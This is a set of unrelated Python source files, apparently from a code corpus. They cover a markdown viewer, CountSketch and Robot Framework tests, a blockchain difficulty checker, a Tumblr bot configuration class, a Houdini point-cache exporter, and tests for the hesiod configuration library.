os.path.join(os.path.dirname(__file__), 'templates')
]).get_template('viewer.mako')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.metrics.add('markdown_version', markdown.version)
def render(self):
"""Render a markdown file to html."""
with open(self.file_path, 'r') as fp:
body = markdown.markdown(fp.read(), extensions=[EscapeHtml()])
return self.TEMPLATE.render(base=self.assets_url, body=body)
@property
def file_required(self):
return True
@property
def cache_result(self):
return True
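# Illustrative behaviour of the EscapeHtml extension (a sketch; exact output
# depends on the installed python-markdown version):
#
#     markdown.markdown('<b>bold</b> and *emphasis*', extensions=[EscapeHtml()])
#
# Raw HTML is escaped instead of being passed through, while regular markdown
# syntax such as *emphasis* still renders normally.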
|
143910
|
import array
import pytest
from pdsa.frequency.count_sketch import CountSketch
def test_init():
cs = CountSketch(2, 4)
assert cs.sizeof() == 32, 'Unexpected size in bytes'
with pytest.raises(ValueError) as excinfo:
cs = CountSketch(0, 5)
assert str(excinfo.value) == 'At least one counter array is required'
with pytest.raises(ValueError) as excinfo:
cs = CountSketch(5, 0)
assert str(excinfo.value) == (
'The length of the counter array cannot be less then 1'
)
def test_size():
cs = CountSketch(2, 4)
element_size = array.array('i', [1]).itemsize
assert cs.sizeof() == element_size * len(cs), "Unexpected size in bytes"
def test_create_from_expected_error():
cs = CountSketch.create_from_expected_error(0.0001, 0.01)
assert repr(cs) == "<CountSketch (5 x 271828209)>"
assert len(cs) == 1359141045, 'Unexpected length'
assert cs.sizeof() == 5436564180, 'Unexpected size in bytes'
with pytest.raises(ValueError) as excinfo:
cs = CountSketch.create_from_expected_error(0.001, 2)
assert str(excinfo.value) == 'Error rate shell be in (0, 1)'
with pytest.raises(ValueError) as excinfo:
cs = CountSketch.create_from_expected_error(0.0000000001, 0.02)
assert str(excinfo.value) == 'Deviation is too small. Not enough counters'
def test_repr():
cs = CountSketch(2, 4)
assert repr(cs) == "<CountSketch (2 x 4)>"
cs = CountSketch.create_from_expected_error(0.1, 0.01)
assert repr(cs) == "<CountSketch (5 x 272)>"
def test_add():
cs = CountSketch(4, 100)
for word in ["test", 1, {"hello": "world"}]:
cs.add(word)
assert cs.frequency(word) == 1, "Can't find frequency for element"
def test_frequency():
cs = CountSketch(4, 100)
cs.add("test")
assert cs.frequency("test") == 1, "Can't find recently added element"
assert cs.frequency("test_test") == 0, "False positive detected"
def test_len():
cs = CountSketch(2, 4)
assert len(cs) == 8
|
143913
|
from .batch import AsyncBatchEnv, BatchEnv, SyncBatchEnv
from .wrappers import Atari, ChannelFirst, Monitor
__all__ = [
"BatchEnv",
"SyncBatchEnv",
"AsyncBatchEnv",
"ChannelFirst",
"Atari",
"Monitor",
]
|
143982
|
import unittest
from os.path import join
from robot import api, model, parsing, reporting, result, running
from robot.api import parsing as api_parsing
from robot.utils.asserts import assert_equal, assert_true
class TestExposedApi(unittest.TestCase):
def test_execution_result(self):
assert_equal(api.ExecutionResult, result.ExecutionResult)
def test_test_suite(self):
assert_equal(api.TestSuite, running.TestSuite)
def test_result_writer(self):
assert_equal(api.ResultWriter, reporting.ResultWriter)
def test_visitors(self):
assert_equal(api.SuiteVisitor, model.SuiteVisitor)
assert_equal(api.ResultVisitor, result.ResultVisitor)
def test_deprecated_parsing(self):
assert_equal(api.get_model, parsing.get_model)
assert_equal(api.get_resource_model, parsing.get_resource_model)
assert_equal(api.get_tokens, parsing.get_tokens)
assert_equal(api.get_resource_tokens, parsing.get_resource_tokens)
assert_equal(api.Token, parsing.Token)
def test_parsing_getters(self):
assert_equal(api_parsing.get_model, parsing.get_model)
assert_equal(api_parsing.get_resource_model, parsing.get_resource_model)
assert_equal(api_parsing.get_tokens, parsing.get_tokens)
assert_equal(api_parsing.get_resource_tokens, parsing.get_resource_tokens)
def test_parsing_token(self):
assert_equal(api_parsing.Token, parsing.Token)
def test_parsing_model_statements(self):
for cls in parsing.model.Statement._statement_handlers.values():
assert_equal(getattr(api_parsing, cls.__name__), cls)
assert_true(not hasattr(api_parsing, 'Statement'))
def test_parsing_model_blocks(self):
for name in ('File', 'SettingSection', 'VariableSection', 'TestCaseSection',
'KeywordSection', 'CommentSection', 'TestCase', 'Keyword', 'For',
'If'):
assert_equal(getattr(api_parsing, name), getattr(parsing.model, name))
assert_true(not hasattr(api_parsing, 'Block'))
def test_parsing_visitors(self):
assert_equal(api_parsing.ModelVisitor, parsing.ModelVisitor)
assert_equal(api_parsing.ModelTransformer, parsing.ModelTransformer)
class TestModelObjects(unittest.TestCase):
"""These model objects are part of the public API.
They are only seldom needed directly and thus not exposed via the robot.api
package. Tests just validate they are not removed accidentally.
"""
def test_running_objects(self):
assert_true(running.TestSuite)
assert_true(running.TestCase)
assert_true(running.Keyword)
def test_result_objects(self):
assert_true(result.TestSuite)
assert_true(result.TestCase)
assert_true(result.Keyword)
class TestTestSuiteBuilder(unittest.TestCase):
# This list has paths like `/path/file.py/../file.robot` on purpose.
# They don't work unless normalized.
sources = [join(__file__, '../../../atest/testdata/misc', name)
for name in ('pass_and_fail.robot', 'normal.robot')]
def test_create_with_datasources_as_list(self):
suite = api.TestSuiteBuilder().build(*self.sources)
assert_equal(suite.name, 'Pass And Fail & Normal')
def test_create_with_datasource_as_string(self):
suite = api.TestSuiteBuilder().build(self.sources[0])
assert_equal(suite.name, 'Pass And Fail')
if __name__ == '__main__':
unittest.main()
|
143997
|
from uwallet.blockchain import unet
from uwallet.blockchain import ArithUint256
GENESIS_BITS = 0x1f07ffff
MAX_TARGET = 0x0007FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
N_TARGET_TIMESPAN = 150
def check_bits(bits):
bitsN = (bits >> 24) & 0xff
assert 0x03 <= bitsN <= 0x1f, \
"First part of bits should be in [0x03, 0x1d], but it was {}".format(hex(bitsN))
bitsBase = bits & 0xffffff
assert 0x8000 <= bitsBase <= 0x7fffff, \
"Second part of bits should be in [0x8000, 0x7fffff] but it was {}".format(bitsBase)
def get_target(index, first, last, chain='main'):
"""
this follows the calculations in lbrycrd/src/lbry.cpp
Returns: (bits, target)
"""
if index == 0:
return GENESIS_BITS, MAX_TARGET
assert last is not None, "Last shouldn't be none"
# bits to target
bits = last.get('bits')
# print_error("Last bits: ", bits)
    check_bits(bits)
# new target
nActualTimespan = last.get('timestamp') - first.get('timestamp')
nTargetTimespan = N_TARGET_TIMESPAN #150
nModulatedTimespan = nTargetTimespan - (nActualTimespan - nTargetTimespan) / 8
nMinTimespan = nTargetTimespan - (nTargetTimespan / 8)
nMaxTimespan = nTargetTimespan + (nTargetTimespan / 2)
if nModulatedTimespan < nMinTimespan:
nModulatedTimespan = nMinTimespan
elif nModulatedTimespan > nMaxTimespan:
nModulatedTimespan = nMaxTimespan
bnOld = ArithUint256.SetCompact(bits)
bnNew = bnOld * nModulatedTimespan
# this doesn't work if it is nTargetTimespan even though that
# is what it looks like it should be based on reading the code
# in lbry.cpp
bnNew /= nModulatedTimespan
if bnNew > MAX_TARGET:
bnNew = ArithUint256(MAX_TARGET)
return bnNew.GetCompact(), bnNew._value
def verify_target(block):
#bits = int('0x' + block.get('bits'), 16)
bits = int(block.get('bits'),16)
#print bits
_, target = bits_to_target(bits)
int_hash = int('0x' + block.get('hash'), 16)
print ("int_hash: ", int_hash)
print ("target : ", target)
if (int_hash <= target):
print ("verify target success")
else:
print ("verify target failed")
def bits_to_target(rex):
value = ArithUint256.SetCompact(rex) #rex: 0x1111
return value.GetCompact(), value._value
def main():
# 2 block . data from blockchain-cli.
block_1 = {}
block_1['hash'] = '00022b278c567c27569618ba94fcfff38f0e5cffbce90a99cea80bc5cab89724'
block_1['bits'] = "1f07ffff"
block_1['timestamp'] = 1511426385
# 3 block
block_2 = {}
block_2['hash'] = '0006b528e8d76c90056d1685ca2dd9959726c7bfce9871ebd511a5aa44de0905'
block_2['bits'] = "1f07ffff"
block_2['timestamp'] = 1511426707
# 1000 block
block_3 = {}
block_3['hash'] = '000447de95629ec2efa86cf95c2042491278ff49b822f12b701cb4c848051376'
block_3['bits'] = "1f079a69"
block_3['timestamp'] = 1511774706
# 1001 block
block_4 = {}
block_4['hash'] = '0007ac5bea8f2088135eb987462d85a82ae953257f5ee771f3f0631043da1148'
block_4['bits'] = "1f07c913"
block_4['timestamp'] = 1511774724
bits, target = get_target(0, block_1, block_2)
#to test bits to target.
#bits_0, target_0 = bits_to_target(GENESIS_BITS)
#print ("bits_0 :", bits_0)
#print ("target_0:", target_0)
verify_target(block_3)
verify_target(block_4)
if __name__ == '__main__':
main()
|
143998
|
from typing import List, Set, Dict
import json
import pytumblr
from api_tumblr.pytumblr_wrapper import RateLimitClient
API_KEYS_TYPE = List[str]
class BotSpecificConstants:
"""Values specific to my development environment and/or the social context of my bot, e.g. specific posts IDs where I need apply some override, or specific users I need to treat specially, etc"""
def __init__(
self,
blogName: str,
dash_blogName: str,
REBLOG_START_TS: int,
DASH_START_TS: int,
private_clients_api_keys: List[API_KEYS_TYPE],
dashboard_clients_api_keys: List[API_KEYS_TYPE],
bridge_service_host: str,
bridge_service_port: int,
BRIDGE_SERVICE_REMOTE_HOST: str,
BUCKET_NAME: str,
ask_min_words: int,
NO_REBLOG_IDS: Set[int] = set(),
DEF_REBLOG_IDS: Set[int] = set(),
FORCE_TRAIL_HACK_IDS: Set[int] = set(),
USER_AVOID_LIST: Set[str] = set(),
TAG_AVOID_LIST: Set[str] = set(),
DASH_TAG_AVOID_LIST: Set[str] = set(),
REPLY_USER_AUTO_ACCEPT_LIST: Set[str] = set(),
bad_strings: Set[str] = set(),
bad_strings_shortwords: Set[str] = set(),
okay_superstrings: Set[str] = set(),
likely_obscured_strings: Set[str] = set(),
profane_strings: Set[str] = set(),
hardstop_strings_review: Set[str] = set(),
hardstop_strings_reject: Set[str] = set(),
LIMITED_USERS: Dict[str, float] = dict(),
LIMITED_SUBSTRINGS: Dict[str, float] = dict(),
SCREENED_USERS: Set[str] = set(),
NO_SCRAPE_USERS: Set[str] = set(),
):
# TODO: standardize case in names
self.blogName = blogName
self.dash_blogName = dash_blogName
# when reblog feature started
self.REBLOG_START_TS = REBLOG_START_TS
# when reblog-from-dash feature started
self.DASH_START_TS = DASH_START_TS
# don't reblog these post IDs -- generally used when I want to write about the bot and then reblog to the bot
# i don't want a separate bot reblog "responding" to me
self.NO_REBLOG_IDS = NO_REBLOG_IDS
self.DEF_REBLOG_IDS = DEF_REBLOG_IDS
# overrides for tumblr blockquote weirdness
self.FORCE_TRAIL_HACK_IDS = FORCE_TRAIL_HACK_IDS
# tumblr api keys (4 strings per key)
self.private_clients_api_keys = private_clients_api_keys
self.dashboard_clients_api_keys = dashboard_clients_api_keys
# host name of the bridge service used in clients we expect to be running on the same machine
# (i.e. should be localhost under normal circumstances)
self.bridge_service_host = bridge_service_host
# port of the bridge service
self.bridge_service_port = bridge_service_port
# name of Google Cloud Storage bucket used to store models and data
self.BUCKET_NAME = BUCKET_NAME
# host name of the bridge service used in ML code
# if the ML code is running remotely, this will differ from `bridge_service_host`
self.BRIDGE_SERVICE_REMOTE_HOST = BRIDGE_SERVICE_REMOTE_HOST
# don't interact or mention these users
self.USER_AVOID_LIST = USER_AVOID_LIST
# bot-written post tags are removed if they contain any of these (substring matches, case-insensitive)
self.TAG_AVOID_LIST = TAG_AVOID_LIST
# don't reblog from dash if tags contain these (substring matches)
self.DASH_TAG_AVOID_LIST = DASH_TAG_AVOID_LIST
# for frequent repliers who don't otherwise trigger "OK to respond to this reply" logic
self.REPLY_USER_AUTO_ACCEPT_LIST = REPLY_USER_AUTO_ACCEPT_LIST
# write draft instead of auto-publish when post/tags contain these substrings
self.bad_strings = bad_strings
# form elements of bad_strings from these surrounded by various whitespace/punctuation
self.bad_strings_shortwords = bad_strings_shortwords
# ignore items from `bad_strings` when they appear inside of these longer strings
# e.g. if we wanted to filter "sex" without filtering "anne sexton"
self.okay_superstrings = okay_superstrings
# like bad_strings, but we attempt to detect these even if the user is trying to obscure them
# with e.g. zero-width unicode or l33tsp34k
self.likely_obscured_strings = likely_obscured_strings
# like bad_strings, but only used in contexts where we're trying to keep the language rated PG
self.profane_strings = profane_strings
# force write draft instead of auto-publish on these strings, even if ML model accepts post
self.hardstop_strings_review = hardstop_strings_review
self.hardstop_strings_review.update(USER_AVOID_LIST)
self.hardstop_strings_review.update(likely_obscured_strings)
# force ignore post on these strings, even if ML model accepts post
self.hardstop_strings_reject = hardstop_strings_reject
# `LIMITED_USERS` allows limiting the rate at which we interact with certain users, e.g. bots who post extremely often or people who send huge numbers of asks
#
# `LIMITED_USERS` should be a dict with usernames as keys. the values are floats. a value of X means approximately "respond to this user at most once per X hours."
self.LIMITED_USERS = LIMITED_USERS
# like `LIMITED_USERS`, but triggers the limiting on the presence of a substring in the input, rather than the name of the user
self.LIMITED_SUBSTRINGS = LIMITED_SUBSTRINGS
# write draft instead of auto-publish when responding to these users
self.SCREENED_USERS = SCREENED_USERS
self.NO_SCRAPE_USERS = NO_SCRAPE_USERS
self.ask_min_words = ask_min_words
@staticmethod
def load(path: str = "config.json") -> "BotSpecificConstants":
with open(path, "r", encoding="utf-8") as f:
constants = json.load(f)
list_to_set_keys = {
"NO_REBLOG_IDS",
"FORCE_TRAIL_HACK_IDS",
"USER_AVOID_LIST",
"TAG_AVOID_LIST",
"DASH_TAG_AVOID_LIST",
"REPLY_USER_AUTO_ACCEPT_LIST",
"bad_strings",
"bad_strings_shortwords",
"okay_superstrings",
"likely_obscured_strings",
"profane_strings",
"hardstop_strings_review",
"hardstop_strings_reject",
"SCREENED_USERS",
"NO_SCRAPE_USERS",
}
for list_to_set_key in list_to_set_keys:
constants[list_to_set_key] = set(constants[list_to_set_key])
return BotSpecificConstants(**constants)
@property
def private_clients(self) -> List[RateLimitClient]:
return [
RateLimitClient.from_tumblr_rest_client(
pytumblr.TumblrRestClient(*keys), self.blogName
)
for keys in self.private_clients_api_keys
]
@property
def dashboard_clients(self) -> List[RateLimitClient]:
return [
RateLimitClient.from_tumblr_rest_client(
pytumblr.TumblrRestClient(*keys), self.dash_blogName
)
for keys in self.dashboard_clients_api_keys
]
@property
def bridge_service_url(self):
return self.bridge_service_host + ":" + str(self.bridge_service_port)
def LIMITED_USERS_PROBS(self, EFFECTIVE_SLEEP_TIME) -> dict:
LIMITED_USERS_MINUTES_LOWER_BOUNDS = {
name: hours * 60 for name, hours in self.LIMITED_USERS.items()
}
LIMITED_USERS_PROBS = {
name: EFFECTIVE_SLEEP_TIME / (60 * lb)
for name, lb in LIMITED_USERS_MINUTES_LOWER_BOUNDS.items()
}
return LIMITED_USERS_PROBS
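# Worked example for LIMITED_USERS_PROBS (illustrative; the username and the
# sleep time are hypothetical): with LIMITED_USERS = {"somebot": 6} and an
# EFFECTIVE_SLEEP_TIME of 300 seconds, the lower bound is 6 * 60 = 360 minutes
# and the per-wakeup response probability is 300 / (60 * 360) ~= 0.014, i.e.
# roughly one response to "somebot" every 6 hours on average.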
|
144018
|
import os
import sys
import hou
import struct
class pcache(object):
fileName = ""
fileType = 'a'
fileVersion = 1.0
propertyNames = []
propertyTypes = []
propertyData = bytearray()
itemcount = 0
itemstride = 0
defaultBindings = {
'P': 'position',
'N': 'normal',
'v': 'velocity',
'Cd': 'color',
'Alpha': 'alpha',
'uv': 'texCoord',
'age': 'age',
'life': 'lifetime'
}
components = ['x', 'y', 'z', 'w']
def __init__(self, filename=None):
self.clear()
if filename is not None: # read file
self.loadFromFile(filename)
def clear(self):
self.fileName = ""
self.fileType = 'a'
self.fileVersion = 1.0
self.propertyNames = []
self.propertyTypes = []
self.propertyData = bytearray()
self.itemcount = 0
self.itemstride = 0
def setDataFromGeometry(self, geo, export_attribs, property_names=None):
        # reads point data from the given Houdini geometry
if not isinstance(geo, hou.Geometry):
raise hou.Error("Input is not not a valid Houdini Geometry")
self.clear()
bindings = {}
attribs = export_attribs.split(' ')
if property_names is None: # use default corresponding table
bindings = self.defaultBindings
else:
propnames = property_names.split(' ')
for i in xrange(len(attribs)):
bindings[attribs[i]] = propnames[i]
retained_attribs = []
for attrib in attribs:
geo_attr = geo.findPointAttrib(attrib)
if geo_attr is not None:
data_type = geo_attr.dataType()
if data_type == hou.attribData.Int:
str_type = 'int'
elif data_type == hou.attribData.Float:
str_type = 'float'
components = geo_attr.size()
retained_attribs.append(geo_attr)
if components == 1: # float
self.propertyNames.append(bindings[attrib])
self.propertyTypes.append(str_type)
self.itemstride += 4
elif components <= 4: # vector
for i in xrange(components):
self.propertyNames.append(bindings[attrib] + ".{}".format(self.components[i]))
self.propertyTypes.append(str_type)
self.itemstride += 4
else:
raise hou.NodeWarning("Point attribute not found : {}".format(attrib))
print("------- {} PROPERTIES --------".format(len(self.propertyNames)))
for i in xrange(len(self.propertyNames)):
print("Property : {} ({})".format(self.propertyNames[i], self.propertyTypes[i]))
points = geo.points()
numpt = len(points)
self.itemcount = numpt
for point in points:
for i in xrange(len(retained_attribs)):
attr = retained_attribs[i]
val = point.attribValue(attr)
if self.propertyTypes[i] == "float":
t = 'f'
elif self.propertyTypes[i] == "int":
t = 'i'
if attr.size() > 1:
for comp in val:
pack = struct.pack(t, comp)
for byte in pack:
self.propertyData.append(byte)
else:
pack = struct.pack(t, val)
for byte in pack:
self.propertyData.append(byte)
def __getComponentCountFromName(self, name):
retval = 1
for i in xrange(len(self.components)):
if name.endswith(".{}".format(self.components[i])):
return i+1
return retval
def __isVectorComponent(self, name):
for i in xrange(len(self.components)):
if name.endswith(".{}".format(self.components[i])):
return True
return False
def __componentIndexOf(self, name):
retval = -1
for i in xrange(len(self.components)):
if name.endswith(".{}".format(self.components[i])):
return i
return retval
def __getNameWithoutComponent(self, name):
retval = name
for i in xrange(len(self.components)):
if name.endswith(".{}".format(self.components[i])):
return name.replace(".{}".format(self.components[i]),"")
return retval
def __reverseBinding(self, propertyName):
for key in self.defaultBindings:
if propertyName == self.defaultBindings[key]:
return key
return None
def createGeo(self, geo, useRecommendedNames=True):
# sets data into geometry
if not isinstance(geo, hou.Geometry):
raise hou.Error("Input is not not a valid Houdini Geometry")
geo.clear()
# deduce attributes to create from properties
attribs_to_create = {}
attribs_types_to_create = {}
attribs_property = {}
for i in xrange(len(self.propertyNames)):
name = self.propertyNames[i]
type = self.propertyTypes[i]
comp = self.__getNameWithoutComponent(name)
if useRecommendedNames:
attrib_name = self.__reverseBinding(comp)
if attrib_name is not None:
attribs_property[attrib_name] = comp
comp = attrib_name
else:
attribs_property[comp] = comp
complen = self.__getComponentCountFromName(name)
            attribs_types_to_create[comp] = type
if comp in attribs_to_create:
attribs_to_create[comp] = max(attribs_to_create[comp], complen)
else:
attribs_to_create[comp] = complen
# Attrib Creation, item structure
for comp in attribs_to_create:
if geo.findPointAttrib(comp) is None:
print "{} point attribute not found: creating...".format(comp)
if attribs_types_to_create[comp] == "float":
default_val = 0.0
elif attribs_types_to_create[comp] == "int":
default_val = 0
else:
default_val = None
if attribs_to_create[comp] == 1:
geo.addAttrib(hou.attribType.Point, comp, default_val)
else:
default_vec = list()
for i in xrange(attribs_to_create[comp]):
default_vec.append(default_val)
geo.addAttrib(hou.attribType.Point, comp, default_vec)
# Data Storage
for i in xrange(self.itemcount):
pt = geo.createPoint()
# get bytes
item_data = self.propertyData[i * self.itemstride: (i * self.itemstride) + self.itemstride]
attrib_data = {}
# fill in data
index = 0
for j in xrange(len(self.propertyNames)):
# get actual value
if self.propertyTypes[j] == "float":
val = struct.unpack("f", item_data[index:index+4])
index += 4
# print "Unpack Float ({}) : {}".format(self.propertyNames[j], val[0])
elif self.propertyTypes[j] == "int":
val = struct.unpack("i", item_data[index:index+4])
index += 4
# print "Unpack Integer ({}) : {}".format(self.propertyNames[j], val[0])
else:
val = None
if self.__isVectorComponent(self.propertyNames[j]):
# for vector stuff
key = self.__reverseBinding(self.__getNameWithoutComponent(self.propertyNames[j]))
idx = self.__componentIndexOf(self.propertyNames[j])
if key not in attrib_data:
attrib_data[key] = [0.0, 0.0, 0.0]
attrib_data[key][idx] = val[0]
else:
# 1-component data
key = self.__reverseBinding(self.__getNameWithoutComponent(self.propertyNames[j]))
attrib_data[key] = val[0]
# print attrib_data
for attrib in attrib_data:
pt.setAttribValue(attrib, attrib_data[attrib])
def loadFromFile(self, filename):
        with open(filename, "rb") as file:
magic = file.readline()
if magic != "pcache\n":
raise hou.Error("Invalid file header: expected pcache magic number : {}".format(magic))
self.clear()
done = False
while not done:
with hou.InterruptableOperation("Loading PCACHE Header", open_interrupt_dialog=False) as operation:
line = file.readline().replace("\n","")
words = line.split(" ")
kw = words[0]
if kw == "end_header":
done = True
elif kw == "format":
if words[1] == "ascii":
self.fileType = 'a'
elif words[1] == "binary":
self.fileType = 'b'
else:
raise hou.Error("Invalid format: {}".format(words[1]))
elif kw == "elements":
count = int(words[1])
self.itemcount = count
elif kw == "property":
if len(words) != 3:
raise hou.Error("Invalid property description: {}".format(words))
if words[1] == "float":
self.propertyTypes.append("float")
self.propertyNames.append(words[2])
self.itemstride += 4
elif words[1] == "int":
self.propertyTypes.append("int")
self.propertyNames.append(words[2])
self.itemstride += 4
elif kw == "comment":
print ' '.join(words).replace("comment ", "")
self.propertyData = bytearray(file.read())
print "Item Stride is {} bytes".format(self.itemstride)
length = len(self.propertyData)
self.itemcount = length/self.itemstride
print "Found {} bytes of data, corresponding to {} items".format(length, self.itemcount)
def saveAsFile(self, filename):
# save data
file = open(filename, "wb")
file.write("pcache\n") # header magic number
file.write("comment PCACHE file Exported from Houdini\n") # -------------------
file.write("format binary 1.0\n") # version and format
file.write("elements {}\n".format(self.itemcount)) # item count
for i in xrange(len(self.propertyNames)): # every property
file.write("property {} {}\n".format(self.propertyTypes[i], self.propertyNames[i]))
file.write("end_header\n") # end of header
# data
file.write(self.propertyData)
file.close()
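# Example of the ASCII header this class writes and parses (illustrative; the
# property list depends on the exported point attributes):
#
#     pcache
#     comment PCACHE file Exported from Houdini
#     format binary 1.0
#     elements 1024
#     property float position.x
#     property float position.y
#     property float position.z
#     property float age
#     end_header
#
# The header is followed by itemcount * itemstride bytes of struct-packed
# binary data (4 bytes per property component).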
|
144065
|
from fireo.fields import TextField, NumberField
from fireo.models import Model
class City(Model):
name = TextField()
population = NumberField()
def test_issue_126():
city = City.collection.create(name='NYC', population=500000, no_return=True)
    assert city is None
|
144095
|
import shutil
import sys
from datetime import datetime
from pathlib import Path
from typing import Any, Dict, List, Tuple
import pytest
import hesiod.core as hcore
from hesiod import get_cfg_copy, get_out_dir, get_run_name, hcfg, hmain
from hesiod.core import _parse_args
def test_args_kwargs(base_cfg_dir: Path, simple_run_file: Path) -> None:
@hmain(base_cfg_dir, run_cfg_file=simple_run_file, create_out_dir=False, parse_cmd_line=False)
def test(a: int, b: str, c: float = 3.4) -> Tuple[int, str, float]:
return a, b, c
ra, rb, rc = test(2, "param_b", c=1.23456)
assert ra == 2
assert rb == "param_b"
assert rc == 1.23456
def test_load_config_simple(base_cfg_dir: Path, simple_run_file: Path) -> None:
@hmain(base_cfg_dir, run_cfg_file=simple_run_file, create_out_dir=False, parse_cmd_line=False)
def test() -> None:
assert hcfg("group_1.param_a") == 1
assert hcfg("group_1.param_b") == 1.2
assert hcfg("group_2.param_c") is True
assert hcfg("group_2.param_d") == "param_d"
assert hcfg("group_3.param_e.param_f") == "param_f"
assert hcfg("group_3.param_e.param_g") == 2
assert hcfg("group_3.param_e.param_h") == 4.56
test()
def test_load_config_complex(base_cfg_dir: Path, complex_run_file: Path) -> None:
@hmain(base_cfg_dir, run_cfg_file=complex_run_file, create_out_dir=False, parse_cmd_line=False)
def test() -> None:
assert hcfg("dataset.name") == "cifar10"
assert hcfg("dataset.path") == "/path/to/cifar10"
assert hcfg("dataset.splits") == [70, 20, 10]
assert hcfg("dataset.classes") == [1, 5, 6]
assert hcfg("net.name") == "efficientnet"
assert hcfg("net.num_layers") == 20
assert hcfg("net.ckpt_path") == "/path/to/efficientnet"
assert hcfg("run_name") == "test"
assert hcfg("lr") == 5e-3
assert hcfg("optimizer") == "adam"
test()
def test_load_config_wrong(base_cfg_dir: Path, wrong_run_file: Path) -> None:
@hmain(base_cfg_dir, run_cfg_file=wrong_run_file, create_out_dir=False, parse_cmd_line=False)
def test() -> None:
pass
with pytest.raises(ValueError):
test()
def test_hcfg(base_cfg_dir: Path, simple_run_file: Path) -> None:
@hmain(base_cfg_dir, run_cfg_file=simple_run_file, create_out_dir=False, parse_cmd_line=False)
def test() -> None:
g1pa = hcfg("group_1.param_a", int)
assert g1pa == 1 and isinstance(g1pa, int)
g1pb = hcfg("group_1.param_b", float)
assert g1pb == 1.2 and isinstance(g1pb, float)
g2pc = hcfg("group_2.param_c", bool)
assert g2pc is True and isinstance(g2pc, bool)
g2pd = hcfg("group_2.param_d", str)
assert g2pd == "param_d" and isinstance(g2pd, str)
g3 = hcfg("group_3", Dict[str, Any])
assert isinstance(g3, dict)
g4 = hcfg("group_4", Tuple[int, bool, str]) # type: ignore
assert g4 == (1, True, "test") and isinstance(g4, tuple)
g5 = hcfg("group_5", List[float])
assert g5 == [0.1, 0.1, 0.1] and isinstance(g5, list)
with pytest.raises(TypeError):
hcfg("group_1.param_a", str)
with pytest.raises(TypeError):
hcfg("group_1.param_b", int)
with pytest.raises(TypeError):
hcfg("group_2.param_c", str)
with pytest.raises(TypeError):
hcfg("group_2.param_d", bool)
with pytest.raises(TypeError):
hcfg("group_3", Dict[str, int])
with pytest.raises(TypeError):
hcfg("group_4", Tuple[int, float, int]) # type: ignore
with pytest.raises(TypeError):
hcfg("group_5", List[str])
test()
def test_cfg_copy(base_cfg_dir: Path, complex_run_file: Path) -> None:
@hmain(base_cfg_dir, run_cfg_file=complex_run_file, create_out_dir=False, parse_cmd_line=False)
def test() -> None:
cfg_copy = get_cfg_copy()
assert cfg_copy == hcore._CFG
assert id(cfg_copy) != id(hcore._CFG)
cfg_copy["dataset"]["name"] = "new_dataset"
assert hcore._CFG["dataset"]["name"] == "cifar10"
assert cfg_copy != hcore._CFG
test()
def test_out_dir(base_cfg_dir: Path, complex_run_file: Path) -> None:
@hmain(base_cfg_dir, run_cfg_file=complex_run_file, parse_cmd_line=False)
def test1() -> None:
out_dir = get_out_dir()
assert out_dir.absolute() == Path("logs/test").absolute()
@hmain(base_cfg_dir, run_cfg_file="logs/test/run.yaml", parse_cmd_line=False)
def test2() -> None:
out_dir = get_out_dir()
assert out_dir.absolute() == Path("logs/test").absolute()
test1()
test2()
shutil.rmtree("logs")
def test_no_run_name(base_cfg_dir: Path, no_run_name_run_file: Path) -> None:
@hmain(
base_cfg_dir,
run_cfg_file=no_run_name_run_file,
run_name_strategy=None,
parse_cmd_line=False,
)
def test() -> None:
pass
with pytest.raises(ValueError):
test()
def test_default_run_name(base_cfg_dir: Path, no_run_name_run_file: Path) -> None:
@hmain(
base_cfg_dir,
run_cfg_file=no_run_name_run_file,
run_name_strategy=hcore.RUN_NAME_STRATEGY_DATE,
create_out_dir=False,
parse_cmd_line=False,
)
def test() -> None:
now = datetime.now()
run_name = get_run_name()
assert run_name == now.strftime(hcore.RUN_NAME_DATE_FORMAT)
test()
def test_run_name(base_cfg_dir: Path, complex_run_file: Path) -> None:
@hmain(base_cfg_dir, run_cfg_file=complex_run_file, create_out_dir=False, parse_cmd_line=False)
def test() -> None:
run_name = get_run_name()
assert run_name == "test"
test()
def test_parse_args(base_cfg_dir: Path, simple_run_file: Path) -> None:
@hmain(
base_cfg_dir=base_cfg_dir,
run_cfg_file=simple_run_file,
create_out_dir=False,
parse_cmd_line=False,
)
def test() -> None:
args = [
"group_1.param_a=5",
"group_1.param_c=1.2345",
"group_1.param_d=1e-4",
"group_1.param_e=False",
"-group_3.param_e.param_i:this is a test",
"--group_5=[1, 2, 3]",
'---group_6.subgroup.subsubgroup.subsubsubgroup:(1.2, "test", True)',
'----param_7=\\|!"£$%&/()=?^€[]*@#°§<>,;.:-_+=abcABC123àèìòùç',
"param_8:{7, 8, 9}",
"param_9:=value",
"param_10=:value",
"param_11==value",
"param_12::value",
"#param_13:value",
"!param_14=value",
]
_parse_args(args)
assert hcfg("group_1.param_a") == 5
assert hcfg("group_1.param_b") == 1.2
assert hcfg("group_1.param_c") == 1.2345
assert hcfg("group_1.param_d") == 1e-4
assert hcfg("group_1.param_e") is False
assert hcfg("group_2.param_c") is True
assert hcfg("group_2.param_d") == "param_d"
assert hcfg("group_3.param_e.param_f") == "param_f"
assert hcfg("group_3.param_e.param_g") == 2
assert hcfg("group_3.param_e.param_h") == 4.56
assert hcfg("group_3.param_e.param_i") == "this is a test"
assert hcfg("group_4") == (1, True, "test")
assert hcfg("group_5") == [1, 2, 3]
assert hcfg("group_6.subgroup.subsubgroup.subsubsubgroup") == (1.2, "test", True)
assert hcfg("param_7") == '\\|!"£$%&/()=?^€[]*@#°§<>,;.:-_+=abcABC123àèìòùç'
assert hcfg("param_8") == {7, 8, 9}
assert hcfg("param_9") == "=value"
assert hcfg("param_10") == ":value"
assert hcfg("param_11") == "=value"
assert hcfg("param_12") == ":value"
assert hcfg("#param_13") == "value"
assert hcfg("!param_14") == "value"
wrong_args = [
"key value",
"keyvalue",
"key-value",
"key_value",
"=",
":",
"-=",
"-:",
]
for arg in wrong_args:
with pytest.raises(ValueError):
_parse_args([arg])
test()
def test_parse_cmd_line(base_cfg_dir: Path, complex_run_file: Path) -> None:
sys.argv = ["test"]
sys.argv.append("--dataset.classes=[4, 7, 8]")
sys.argv.append("--lr=1e-10")
sys.argv.append('--new_group.new_sub_group.new_sub_param={"t", "e", "s", "t"}')
def check_cfg() -> None:
assert hcfg("dataset.name") == "cifar10"
assert hcfg("dataset.path") == "/path/to/cifar10"
assert hcfg("dataset.splits") == [70, 20, 10]
